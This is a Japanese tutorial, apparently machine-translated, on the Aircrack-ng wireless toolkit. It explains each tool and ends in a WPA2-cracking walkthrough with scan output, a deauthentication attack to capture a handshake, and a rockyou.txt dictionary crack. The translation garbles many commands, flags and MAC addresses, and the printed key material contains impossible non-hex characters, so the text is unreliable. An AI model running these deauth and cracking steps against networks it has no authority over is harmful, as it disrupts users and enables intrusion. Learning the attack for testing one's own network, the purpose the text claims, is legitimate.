Aircrack-ngの使い方

How Use Aircrack Ng



ほとんどの場合、人々は自分が接続しているネットワークについて考えることはありません。彼らは、そのネットワークがどれほど安全であり、日常的に機密データをどれだけ危険にさらすかを決して考えません。と呼ばれる非常に強力なツールを使用して、wifiネットワークで脆弱性チェックを実行できます。 Aircrack-ng およびWireshark。 Wiresharkは、ネットワークアクティビティを監視するために使用されます。 Aircrack-ng は、ワイヤレス接続をハッキングしてアクセスできるようにする攻撃的なツールのようなものです。侵入者として考えることは、ハッキングから身を守るための最も安全な方法です。 Aircrackについて学習することで、侵入者がシステムにアクセスするために実行する正確なアクションを把握できる場合があります。次に、独自のシステムでコンプライアンスチェックを実行して、システムが安全でないことを確認できます。

Aircrack-ng は、WiFiネットワークセキュリティをテストするために設計されたソフトウェアのフルセットです。これは単一のツールではなく、それぞれが特定の目的を実行するツールのコレクションです。アクセスポイントの監視、テスト、ネットワークへの攻撃、wifiネットワークのクラッキング、テストなど、wifiセキュリティのさまざまな領域に取り組むことができます。 Aircrackの主な目的は、パケットを傍受し、ハッシュを解読してパスワードを破ることです。ほぼすべての新しいワイヤレスインターフェイスをサポートします。 Aircrack-ng は古いツールスイートAircrackの改良版であり、ngは 新しい世代 。より大きなタスクを実行する際に連携して機能する素晴らしいツールのいくつか。







エアモン:

Airmon-ngは、ネットワークインターフェイスカードをモニターモードにするaircrack-ngキットに含まれています。ネットワークカードは通常、NICのMACアドレスで定義されているように、対象となるパケットのみを受け入れますが、airmon-ngを使用すると、対象となるかどうかに関係なく、すべてのワイヤレスパケットも受け入れられます。アクセスポイントとのリンクや認証を行わなくても、これらのパケットをキャッチできるはずです。これは、ネットワークインターフェイスを監視モードにしてアクセスポイントのステータスを確認するために使用されます。まず、監視モードをオンにするようにワイヤレスカードを構成する必要があります。次に、プロセスが干渉していると思われる場合は、すべてのバックグラウンドプロセスを強制終了します。プロセスを終了した後、以下のコマンドを実行することにより、ワイヤレスインターフェイスでモニターモードを有効にできます。



[メール保護]:〜$sudoairmon-ng start wlan0

以下のコマンドを使用して、いつでもairmon-ngを停止することにより、モニターモードを無効にすることもできます。



[メール保護]:〜$sudoairmon-ng stop wlan0

Airodump:

Airodump-ngは、私たちを取り巻くすべてのネットワークを一覧表示し、それらに関する貴重な情報を表示するために使用されます。 airodump-ngの基本的な機能はパケットをスニッフィングすることであるため、基本的には、監視モードになっているときに周囲のすべてのパケットを取得するようにプログラムされています。周囲のすべての接続に対して実行し、ネットワークに接続されているクライアントの数、対応するMacアドレス、暗号化スタイル、チャネル名などのデータを収集してから、ターゲットネットワークのターゲティングを開始します。





airodump-ngコマンドを入力し、パラメーターとしてネットワークインターフェイス名を指定することで、このツールをアクティブ化できます。すべてのアクセスポイント、データパケットの量、使用されている暗号化と認証の方法、およびネットワークの名前(ESSID)が一覧表示されます。ハッキングの観点から、MACアドレスは最も重要なフィールドです。

[メール保護]:〜$sudoairodump-ng wlx0mon



Aircrack:

Aircrackはパスワードクラッキングに使用されます。 airodumpを使用してすべてのパケットをキャプチャした後、aircrackでキーをクラックできます。 PTWとFMSの2つの方法を使用してこれらのキーをクラックします。 PTWアプローチは2つのフェーズで行われます。最初はARPパケットのみが使用されており、検索後にキーが解読されない場合にのみ、キャプチャされた他のすべてのパケットが使用されます。 PTWアプローチのプラスのポイントは、すべてのパケットがクラッキングに使用されるわけではないことです。 2番目のアプローチ(FMS)では、統計モデルとブルートフォースアルゴの両方を使用してキーをクラッキングします。辞書方式も使用できます。

Aireplay:

Airplay-ngは、トラフィックを作成または加速するためにワイヤレスネットワークにパケットを導入します。 2つの異なるソースからのパケットは、aireplay-ngによってキャプチャできます。 1つ目はライブネットワークで、2つ目は既存のpcapファイルからのパケットです。 Airplay-ngは、ワイヤレスアクセスポイントとユーザーを標的とする認証解除攻撃の際に役立ちます。さらに、クライアントのシステムからキーを取得できるツールであるairplay-ngを使用して、コーヒーラテ攻撃などの攻撃を実行できます。これは、ARPパケットをキャッチし、それを操作してシステムに送り返すことで実現できます。次に、クライアントはairodumpでキャプチャできるパケットを作成し、aircrackはその変更されたパケットからキーをクラックします。 airplay-ngの他の攻撃オプションには、chopchop、fragmentarepreplayなどがあります。

空軍基地:

Airbase-ngは、侵入者のコンピュータを、他の人がリンクできるように侵害された接続ポイントに変換するために使用されます。 Airbase-ngを使用すると、合法的なアクセスポイントであると主張し、ネットワークに接続されているコンピューターに対してman-in-the-middle攻撃を実行できます。これらの種類の攻撃は、悪の双子攻撃と呼ばれます。基本的なユーザーが合法的なアクセスポイントと偽のアクセスポイントを区別することは不可能です。したがって、邪悪な双子の脅威は、今日私たちが直面している最も脅威的なワイヤレスの脅威の1つです。

Airolib-ng:

Airolibは、パスワードリストとアクセスポイントを保存および管理することにより、ハッキングプロセスをスピードアップします。このプログラムで使用されるデータベース管理システムはSQLite3であり、ほとんどすべてのプラットフォームで利用できます。パスワードクラッキングには、秘密一時キー(PTK)が抽出されるペアワイズマスターキーの計算が含まれます。 PTKを使用すると、特定のパケットのフレームメッセージ識別コード(MIC)を判別し、理論的にはMICがパケットに類似していることを確認できます。したがって、PTKが正しければ、PMKも正しかったのです。

データベースに保存されているパスワードリストとアクセスネットワークを表示するには、次のコマンドを入力します。

[メール保護]:〜$sudoairolib-ng testdatabase –stats

ここで、testdatabaseはアクセスまたは作成するデータベースであり、–statsはそのデータベースに対して実行する操作です。一部のSSIDなどに最大の優先順位を与えるなど、データベースフィールドに対して複数の操作を実行できます。 aircrack-ngでairolib-ngを使用するには、次のコマンドを入力します。

[メール保護]:〜$sudoaircrack-ng-NStestdatabase wpa2.eapol.cap

ここでは、に保存されている計算済みのPMKを使用しています。 テストデータベース パスワードクラッキングプロセスをスピードアップするため。

Aircrack-ngを使用したWPA / WPA2のクラッキング:

いくつかの素晴らしいツールを使ってaircrack-ngができることの小さな例を見てみましょう。辞書方式を使用して、WPA / WPA2ネットワークの事前共有キーを解読します。

最初に行う必要があるのは、モニターモードをサポートするネットワークインターフェイスを一覧表示することです。これは、次のコマンドを使用して実行できます。

[メール保護]:〜$sudoairmon-ng

PHYインターフェイスドライバーチップセット

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

インターフェースが見えます。ここで、次のコマンドを使用して、検出したネットワークインターフェイス(wlx0)をモニターモードにする必要があります。

[メール保護]:〜$sudoairmon-ng start wlx0

と呼ばれるインターフェースでモニターモードを有効にしました wlx0mon

これで、モニターモードに設定したネットワークインターフェイスを介して、近くのルーターによるブロードキャストを聞き始める必要があります。

[メール保護]:〜$sudoairodump-ng wlx0mon

CH5 ][経過:30NS][ 2020-12-02 00:17



BSSIDPWRビーコン#データ、#/ s CH MB ENC CIPHER AUTH ESSID



E4:6F:13:04:CE:31 -4。ファイブ 62 27 0 154e WPA2 CCMP PSK CrackIt

C4:E9:847610:なれ-63 77 0 0 654e。 WPA2 CCMPPSKハックミー

C8:3A:35:A0:4E:01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:与える:88:FA:38:02-68 28 2 0 十一54e WPA2 CCMP PSK TP-Link_3802



BSSID STATIONPWRレートロストフレームプローブ



E4:6F:13:04:CE:315C:3A:フォーファイブ:D7:EA:8B-3 0-1e8 5

E4:6F:13:04:CE:31C4:67:D3:C2:CD:D7-331e-6e0 3

E4:6F:13:04:CE:315C:C3:07:5661:EF-35 0-1 0 6

E4:6F:13:04:CE:31紀元前:91:B5:F8:7E:D5-390e-1 1002 13

私たちのターゲットネットワークは Crackit この場合、現在チャネル1で実行されています。

ここでは、ターゲットネットワークのパスワードを解読するために、デバイスがネットワークに接続しようとしたときに発生する4方向ハンドシェイクをキャプチャする必要があります。次のコマンドを使用してキャプチャできます。

[メール保護]:〜$sudoairodump-ng-NS 1--bssid E4:6F:13:04:CE:31 -の /ホームwlx0

-NS :チャンネル

–bss :ターゲットネットワークのBssid

-の :pcapファイルが配置されるディレクトリの名前

ここで、デバイスがネットワークに接続するのを待つ必要がありますが、ハンドシェイクをキャプチャするためのより良い方法があります。次のコマンドを使用した認証解除攻撃を使用して、APに対してデバイスの認証を解除できます。

[メール保護]:〜$sudoaireplay-ng-0 -にE4:6F:13:04:CE:31

:ターゲットネットワークのBssid

-0 :認証解除攻撃

すべてのデバイスを切断したので、デバイスがネットワークに接続するのを待つ必要があります。

CH1 ][経過:30NS][ 2020-12-200:02][WPAハンドシェイク:E4:6F:13:04:CE:31



BSSID PWRRXQビーコン#データ、#/ s CH MB ENC CIPHER AUTH E



E4:6F:13:04:CE:31 -47 1 228 807 36 154番目のWPA2CCMP PSK P



BSSID STATIONPWRレートロストフレームプローブ



E4:6F:13:04:CE:31紀元前:91:B5:F8:7E:D5-35 0-1 0 1

E4:6F:13:04:CE:315C:3A:フォーファイブ:D7:EA:8B-290e- 1e0 22

E4:6F:13:04:CE:31 8828:B3:3027:7E-310e-1 0 32

E4:6F:13:04:CE:31C4:67:D3:C2:CD:D7-350e-6e263 708CrackIt

E4:6F:13:04:CE:31D4:6A:6A:99:ED:E3-350e- 0e0 86

E4:6F:13:04:CE:315C:C3:07:5661:EF-37 0-1e0 1

ヒットしました。時間のすぐ横の右上隅を見ると、ハンドシェイクがキャプチャされていることがわかります。指定されたフォルダを見てください( /家 私たちの場合) .pcap ファイル。

WPAキーを解読するには、次のコマンドを使用できます。

[メール保護]:〜$sudoaircrack-ng-a2 -のrockyou.txt-NSE4:6F:13:04:CE:31handshake.cap

b:ターゲットネットワークのBssid

-a2:WPA2モード

Rockyou.txt:辞書ファイル中古

Handshake.cap:ファイル どれのキャプチャされたハンドシェイクが含まれています

Aircrack-ng1.2beta3

[00:01:49] 10566テストされたキー((1017.96/NS)。

キーが見つかりました [まいったよ]

マスターキー:8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6F50NS


トランジェントキー:4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC:CB 5A F8 CE62B2 1B F7 6F50C025 62E9 5D71

ターゲットネットワークの鍵は正常に解読されました。

結論:

ワイヤレスネットワークは、スマートフォンを使用する労働者から産業用制御デバイスまで、あらゆる企業で使用されています。調査によると、2021年にはインターネットトラフィックのほぼ50%以上がWiFi経由になります。ワイヤレスネットワークには多くの利点があります。ドアの外での通信、配線がほとんど不可能な場所での迅速なインターネットアクセス、ケーブルを設置せずにネットワークを拡張できます。他のユーザーのために、そしてあなたがそこにいない間あなたのモバイルデバイスをあなたのホームオフィスに簡単に接続することができます。

これらの利点にもかかわらず、あなたのプライバシーとセキュリティについて大きな疑問符があります。これらのネットワークとして;ルーターの送信範囲内は誰でも利用でき、攻撃されやすく、データが危険にさらされる可能性があります。たとえば、公共のWi-Fiに接続している場合、そのネットワークに接続している人は誰でも、インテリジェンスを使用して、利用可能なすばらしいツールを使用してネットワークトラフィックを簡単にチェックし、ダンプすることもできます。